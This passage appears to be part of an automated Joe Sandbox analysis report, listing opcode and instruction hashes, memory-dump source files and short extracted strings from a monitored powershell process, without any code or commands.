                                                                                                                                                      • Opcode ID: 9486ffc9cacfed56490069cd310e013b8d12c78e161d02efccde6a912f630ca2
                                                                                                                                                      • Instruction ID: 165c67df9f325839717ac8f6aea70326e7efccb9ca77308afb30d8f16cfeecc7
                                                                                                                                                      • Opcode Fuzzy Hash: 9486ffc9cacfed56490069cd310e013b8d12c78e161d02efccde6a912f630ca2
                                                                                                                                                      • Instruction Fuzzy Hash: CCC1AD71A002089FDB14EFA8D944AADBBB6FF85314F158A5DE406EB365DB34EC49CB40
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2129249282.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_4880000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ca8bd0062179e507a7ad01f9bbdadfb68adf2d78815087bb79f598e547f74a8e
                                                                                                                                                      • Instruction ID: 87fbbaa6c7a31064ee22aea4949cca5092ab5c4e49e60329050e04a20eab0562
                                                                                                                                                      • Opcode Fuzzy Hash: ca8bd0062179e507a7ad01f9bbdadfb68adf2d78815087bb79f598e547f74a8e
                                                                                                                                                      • Instruction Fuzzy Hash: 15B16E71E00219DFDB10DFA8D98179DBBF1BF48314F148A2DEA15EB254EB74A885CB81
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ec09e60b99bc1c8e9b231f9fbef2456fdc90254a3144d2272400944a13fb1329
                                                                                                                                                      • Instruction ID: 78a4b693187cd89428ba3293075855d09fb037e2c5271f1b87a6fb1ac38bbe52
                                                                                                                                                      • Opcode Fuzzy Hash: ec09e60b99bc1c8e9b231f9fbef2456fdc90254a3144d2272400944a13fb1329
                                                                                                                                                      • Instruction Fuzzy Hash: 8991C3B0B00204EFDB14DB64C955B9EBBE3AB89354F1080A9E9067F755CB72EC46CB91
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c4e35f82d59e2b1d1a5f75da1ae283dd0eaffdab594dbcf0de7673d2812b84af
                                                                                                                                                      • Instruction ID: 172b33059b1a9a5a5d5a25fa88961f3833abd5ae618d2d5ea2a2d4de7ce8a152
                                                                                                                                                      • Opcode Fuzzy Hash: c4e35f82d59e2b1d1a5f75da1ae283dd0eaffdab594dbcf0de7673d2812b84af
                                                                                                                                                      • Instruction Fuzzy Hash: E79193B0A00204EFDB14CB64C955B9EBBF2AF89354F108099E9067F756CB76EC46CB91
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2129249282.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_4880000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: a645b8b4fecf156c4eef628ede89c84cc5a6d0f47a6f8bbaf0674d7df101bab5
                                                                                                                                                      • Instruction ID: 4f8a7af485d512591f886d86f4caf29c92d6739778319c810741d9d121ee12b6
                                                                                                                                                      • Opcode Fuzzy Hash: a645b8b4fecf156c4eef628ede89c84cc5a6d0f47a6f8bbaf0674d7df101bab5
                                                                                                                                                      • Instruction Fuzzy Hash: 57816C30A05244DFCB15EFA4D8849ADBBF2FF89314F5589A9E405EB261CB35EC85CB50
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2129249282.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_4880000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 6b7b292195d95d7c032413feeb3dbaca441f005015d72cd4da532d9308c85b9d
                                                                                                                                                      • Instruction ID: 1bfda78fc2a0bf1d60c92a2a11fed6e3f181e7d1b17993f7ee8613f8d04d078a
                                                                                                                                                      • Opcode Fuzzy Hash: 6b7b292195d95d7c032413feeb3dbaca441f005015d72cd4da532d9308c85b9d
                                                                                                                                                      • Instruction Fuzzy Hash: 4871B170A00219CFCB15DF68D880AADBBF2FF85314F148A6DE415DB6A1DB75AC46CB80
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2129249282.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_4880000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: cfb1220db045c13da464d3e2898ae7b8660bb9e4b151b09fe811da4fc8ddf6be
                                                                                                                                                      • Instruction ID: 3856960b0716ff8a2c531243731dc00438db2ec2e9736bece4a392d7516d992c
                                                                                                                                                      • Opcode Fuzzy Hash: cfb1220db045c13da464d3e2898ae7b8660bb9e4b151b09fe811da4fc8ddf6be
                                                                                                                                                      • Instruction Fuzzy Hash: B2714B70E00218DFDB14EFA4D584AADBBF2BF88344F14892DE415EB650DB35AC86CB50
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2129249282.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_4880000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: deaea5a624c8beceb52d0150b163d270ce87f87b4854d6a58116ea196c814509
                                                                                                                                                      • Instruction ID: 9049ba43d1ba291b435b538ba288bdaeac2f98752b89f43249d9d0d04a056b7f
                                                                                                                                                      • Opcode Fuzzy Hash: deaea5a624c8beceb52d0150b163d270ce87f87b4854d6a58116ea196c814509
                                                                                                                                                      • Instruction Fuzzy Hash: F2714D71E002099FDF14DFA8C98179DBBF1AF88318F14862DE615E7254EB74A886CF91
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2129249282.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_4880000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 78267d2a3425d52bfb5ee942bd016304b8d45c60c0195e4a6cc360ed21a1fde2
                                                                                                                                                      • Instruction ID: bd7113b557cffeb6d2a52a2c75a74d2c3f3117244715ca54c20c3b59e2280741
                                                                                                                                                      • Opcode Fuzzy Hash: 78267d2a3425d52bfb5ee942bd016304b8d45c60c0195e4a6cc360ed21a1fde2
                                                                                                                                                      • Instruction Fuzzy Hash: 18716F71E002099FDF10DFA9C98079DBBF1AF88318F14862DE615E7254EB74A886CF91
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: d0d6397d42baa7cbbd41e1ba16ef2714e1ce5bce939ec8d9407a1c6b5f6ec3f1
                                                                                                                                                      • Instruction ID: 89df9ec9b3506397675fea0275fbfb3a515927c95e0356d970d185ac9ead6b7b
                                                                                                                                                      • Opcode Fuzzy Hash: d0d6397d42baa7cbbd41e1ba16ef2714e1ce5bce939ec8d9407a1c6b5f6ec3f1
                                                                                                                                                      • Instruction Fuzzy Hash: 2D41F7F0A10202DFDB25CFBC8A4166E7BE2AF85294F05C0AAD8029B791D731DC53C7A1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2129249282.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_4880000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ad04cbc4aeb4fa36c5e77fa47c07b92c0b5b3df7f91cf47964dc727b4b4f8307
                                                                                                                                                      • Instruction ID: 18b2c62738da201b9d22cb14245cfb63384d45423b94a2b688708390065d3fd2
                                                                                                                                                      • Opcode Fuzzy Hash: ad04cbc4aeb4fa36c5e77fa47c07b92c0b5b3df7f91cf47964dc727b4b4f8307
                                                                                                                                                      • Instruction Fuzzy Hash: AD416C71A002188FDB15EF24C958ABEBBB2EF89354F15496CE406EB7A1CF35AC41DB50
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2129249282.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_4880000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: dec1a4d014040b6d20268db63cb009ef1d26bbb0e51996577ae516a843a8f202
                                                                                                                                                      • Instruction ID: 3d29a65e427b2d76a68d035b36b053af5d9bc0e6bc6b5640349d6ade221253dd
                                                                                                                                                      • Opcode Fuzzy Hash: dec1a4d014040b6d20268db63cb009ef1d26bbb0e51996577ae516a843a8f202
                                                                                                                                                      • Instruction Fuzzy Hash: CE414C70A00258DFDB14DFB9C8446ADBBF2BF89344F15896DD006EB690DB75A885CF40
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2129249282.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_4880000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 99fe8766973274f78232faeb33d58d499fd1aa8fcf46d374e6cbfe4dfb8f2d35
                                                                                                                                                      • Instruction ID: 7ffaa32d8e41e6bc941b5e01936740be06ac7470f48c140a4ba165efce98919c
                                                                                                                                                      • Opcode Fuzzy Hash: 99fe8766973274f78232faeb33d58d499fd1aa8fcf46d374e6cbfe4dfb8f2d35
                                                                                                                                                      • Instruction Fuzzy Hash: 284139B4A005059FCB19DF58C5949AEFBB1FF48710B158AA9E805AB368C736FC50CFA0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 6d37bb4a0f94b5fbe129954400481dc5a88c99913ecbbb84dc8afbb2926d4065
                                                                                                                                                      • Instruction ID: 0274c537cdee5bfd2ecfb9c0dd4e8ace386bd40f3b85edee0c640a866c741a61
                                                                                                                                                      • Opcode Fuzzy Hash: 6d37bb4a0f94b5fbe129954400481dc5a88c99913ecbbb84dc8afbb2926d4065
                                                                                                                                                      • Instruction Fuzzy Hash: 2D31D670B40214AFE7049B68C955FAF7AA3AF89784F10C065E9016F3A5CF769C428BD1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c0a42185aa034ef99301698d37b6cba29e82c4fe82aa44f3f3bb5510e87fc2e9
                                                                                                                                                      • Instruction ID: 769dd3a5321792ff407f2c04f1bd368227042ad001615b1f57d55eca0454f63c
                                                                                                                                                      • Opcode Fuzzy Hash: c0a42185aa034ef99301698d37b6cba29e82c4fe82aa44f3f3bb5510e87fc2e9
                                                                                                                                                      • Instruction Fuzzy Hash: 76216EB1300306ABD7245A7A8885737BAD69BC9751F28842AA90BDB384CD79D842C371
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2129249282.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_4880000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 0a7ccb789c304c5930933db0a95594f9c39499a963eddc277dcb0e29c09ae289
                                                                                                                                                      • Instruction ID: 9927ec4f20e905e26051077963cf1e642591956097ef233308f5faa35151524c
                                                                                                                                                      • Opcode Fuzzy Hash: 0a7ccb789c304c5930933db0a95594f9c39499a963eddc277dcb0e29c09ae289
                                                                                                                                                      • Instruction Fuzzy Hash: 04312A30B011288FCB25EB64C8546EEB7B2BF89308F1145E9D50AEB355DB35AE85CF91
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c9a009395367e9e0005960a7321ca856f594781688fa58358c1968d393e4d47f
                                                                                                                                                      • Instruction ID: 00616421d44648f7599d25e0414e61b7d9f9ce1067fd8bc66d66b907ba82191b
                                                                                                                                                      • Opcode Fuzzy Hash: c9a009395367e9e0005960a7321ca856f594781688fa58358c1968d393e4d47f
                                                                                                                                                      • Instruction Fuzzy Hash: 5831C0B02093C1AFE7268725C851A91BF61AF43654F5980CBE4828F3A3C665E846D762
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 42d227cd78ff4efb0ff81daf4ba104deeac13a44246b4095b43648a419e90a55
                                                                                                                                                      • Instruction ID: b97e751b679a5a2ab280bcabe35c1e6507c4ec387f37ad2e272c66197666606e
                                                                                                                                                      • Opcode Fuzzy Hash: 42d227cd78ff4efb0ff81daf4ba104deeac13a44246b4095b43648a419e90a55
                                                                                                                                                      • Instruction Fuzzy Hash: 76219AB03083856FD7210A7A88407B27FA55F86740F28805BE886CA3D6C66D8885C372
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2129249282.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_4880000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: edc0f8570615d643cc1cceac3e4bf9a89111ccf245d173b21eb141c32b7f01f4
                                                                                                                                                      • Instruction ID: 1e123a20f52cfaf5ae00f7210f57174dc97f472306210f666039fe663aff2864
                                                                                                                                                      • Opcode Fuzzy Hash: edc0f8570615d643cc1cceac3e4bf9a89111ccf245d173b21eb141c32b7f01f4
                                                                                                                                                      • Instruction Fuzzy Hash: 2B315E74A046099FCB05DF9DC8849AAFBB1FF49310B154699D848EB761C331FC41CBA0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2129249282.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_4880000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 4d7b5c24fe73f60188b62b297a17c88bb50db4c192e2c94dcbbdf3138ceb7b40
                                                                                                                                                      • Instruction ID: ee58837993bb65d0a397c2e4652a10f68e7f153a5d64c178e129b13fd5a2bcd2
                                                                                                                                                      • Opcode Fuzzy Hash: 4d7b5c24fe73f60188b62b297a17c88bb50db4c192e2c94dcbbdf3138ceb7b40
                                                                                                                                                      • Instruction Fuzzy Hash: ED21C775A006099FCB04DF99C990AAABBF5FF89310B148599E909EB361C731FD51CBA0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 71bb460f875d79dff19044ca116096cbfb3921e9a24cfaadc44a8c4e2007da6c
                                                                                                                                                      • Instruction ID: 52a8ce22e0c022681d3d6bf7d56ea57f6a7c4d02fb9028b5f0d340f73f41aeb6
                                                                                                                                                      • Opcode Fuzzy Hash: 71bb460f875d79dff19044ca116096cbfb3921e9a24cfaadc44a8c4e2007da6c
                                                                                                                                                      • Instruction Fuzzy Hash: D301F77631031A9BC724557AD40057AF799DBC5662F14C43EE54ADB750DA32C849CB70
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2129249282.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_4880000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 093c0785531a1f722cc6e058dc3cc9d51b808b4e6bd1f682a0ab2cad98d10ea6
                                                                                                                                                      • Instruction ID: 4791389459314d94f85c7d5dd0783d25a5dba6fc4b5d285b181409b3c2b19720
                                                                                                                                                      • Opcode Fuzzy Hash: 093c0785531a1f722cc6e058dc3cc9d51b808b4e6bd1f682a0ab2cad98d10ea6
                                                                                                                                                      • Instruction Fuzzy Hash: 7911C2B1E04244DFCB02DF68C8505A9BBB1FF4A304B15899AC855DB662C736EC46CB50
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2129249282.0000000004880000.00000040.00000800.00020000.00000000.sdmp, Offset: 04880000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_4880000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 82dc06e0c9872a651c732ff13f25dc94fecdb9d9e08b58bdd8741564721800e4
                                                                                                                                                      • Instruction ID: 734706beea4d93ada421d9e5f9479ea8eb470a0f957ca29a8a57841574b196e9
                                                                                                                                                      • Opcode Fuzzy Hash: 82dc06e0c9872a651c732ff13f25dc94fecdb9d9e08b58bdd8741564721800e4
                                                                                                                                                      • Instruction Fuzzy Hash: C8118670D10149DBEF24EA94D5987ECB7B1AB0932DF151B2DC601F61A0EB74688ACB16
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: ff69a5fbd2dfe1d32ecf646178b5feb21893c9dce29659a0cbff1f1a8979ad98
                                                                                                                                                      • Instruction ID: f802a8ecec7e482b77c3d968513ae5e61a6356de57fed6bab51a2d40bd250f09
                                                                                                                                                      • Opcode Fuzzy Hash: ff69a5fbd2dfe1d32ecf646178b5feb21893c9dce29659a0cbff1f1a8979ad98
                                                                                                                                                      • Instruction Fuzzy Hash: 6CF0A0702042C19FC3268B25C855A10BB71EF83254F19C0CAC049CF367CB76D857EB42
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                      • API String ID: 0-3512890053
                                                                                                                                                      • Opcode ID: b7efbe7b2d24103b8d69eaf2976ea518e171e07e7594c137086cb00c7eb18e58
                                                                                                                                                      • Instruction ID: 3622f77837659d6c587b488fb34326193717a863f252557db69f8a1cb6f5d5fe
                                                                                                                                                      • Opcode Fuzzy Hash: b7efbe7b2d24103b8d69eaf2976ea518e171e07e7594c137086cb00c7eb18e58
                                                                                                                                                      • Instruction Fuzzy Hash: B7A138B17002468FDB254A7A987066A7BF5BF86290F18846BD446CF351DF36CC86C3A1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                                      • API String ID: 0-3732357466
                                                                                                                                                      • Opcode ID: 4f3a3142588b0f6af637b54c7499b85539dd8473c3cdbc68aaa41c9870064404
                                                                                                                                                      • Instruction ID: 0393b99402fff8539d1b6960433bea855a5b521ee98c8693c29701c62abb955c
                                                                                                                                                      • Opcode Fuzzy Hash: 4f3a3142588b0f6af637b54c7499b85539dd8473c3cdbc68aaa41c9870064404
                                                                                                                                                      • Instruction Fuzzy Hash: BFF169B1B04386DFCB258F79C84866ABFE5AF86290F24847AD846CF355DE31C845C7A1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$t~qq$$^q$$^q$$^q
                                                                                                                                                      • API String ID: 0-1719666192
                                                                                                                                                      • Opcode ID: ce1e490ea6df0c2dd6c25f5eb36eccda74656771cb139c50288955303ef4b922
                                                                                                                                                      • Instruction ID: 6cd5aebd5283455cd3ce3eaa62be477d5a2c48256b4fa2148739d2cc921200c0
                                                                                                                                                      • Opcode Fuzzy Hash: ce1e490ea6df0c2dd6c25f5eb36eccda74656771cb139c50288955303ef4b922
                                                                                                                                                      • Instruction Fuzzy Hash: 78D179B1B0020A8FCB259B79D82066EBBF2BFC5260F14847AD556CB345DF31C986C7A1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4'^q$tP^q$tP^q$$^q$(dq$(dq$(dq
                                                                                                                                                      • API String ID: 0-1710924510
                                                                                                                                                      • Opcode ID: 6a0020e86918bcafb6357595f2d330558a79a27870b4d97447a3d5112f4414a0
                                                                                                                                                      • Instruction ID: 27f25f8f71073220a45edc2ca1e68d28cd2e6e173852fc9dd2c4791d2cba21f6
                                                                                                                                                      • Opcode Fuzzy Hash: 6a0020e86918bcafb6357595f2d330558a79a27870b4d97447a3d5112f4414a0
                                                                                                                                                      • Instruction Fuzzy Hash: FC71D6F0B10205DFDB24CE68C544B6ABBF6BF84791F298859E806AB390C771DD85CB91
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4'^q$tP^q$$^q$$^q$$^q
                                                                                                                                                      • API String ID: 0-3997570045
                                                                                                                                                      • Opcode ID: 0b043815e2075dd0a134ad210badb79e1ecd6fc7b90e5f2ddc1de189a98b2102
                                                                                                                                                      • Instruction ID: fc942c2f448bcb4629eb7f6ad7aabb1a234d262db3c878031352bf83926eaec0
                                                                                                                                                      • Opcode Fuzzy Hash: 0b043815e2075dd0a134ad210badb79e1ecd6fc7b90e5f2ddc1de189a98b2102
                                                                                                                                                      • Instruction Fuzzy Hash: C461F5B060021ADFDB24CE64C545B6A77B1AB457A1F1884E9E8125F394C737DC8DCB92
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                      • API String ID: 0-2125118731
                                                                                                                                                      • Opcode ID: 413678f2da10e49f14a8e765d993a464042065832c06128c10db748ac1ca8282
                                                                                                                                                      • Instruction ID: d09f450e68a0cd955939c11dc7cd3cf9124f21871fd1bbee65ee88292c63160f
                                                                                                                                                      • Opcode Fuzzy Hash: 413678f2da10e49f14a8e765d993a464042065832c06128c10db748ac1ca8282
                                                                                                                                                      • Instruction Fuzzy Hash: 032135B171030EABDB3C597A9805B27AADA9BC3755F24C42BA416DF385CD36C886C321
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000006.00000002.2155739106.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_6_2_7670000_powershell.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: $^q$$^q$$^q$$^q
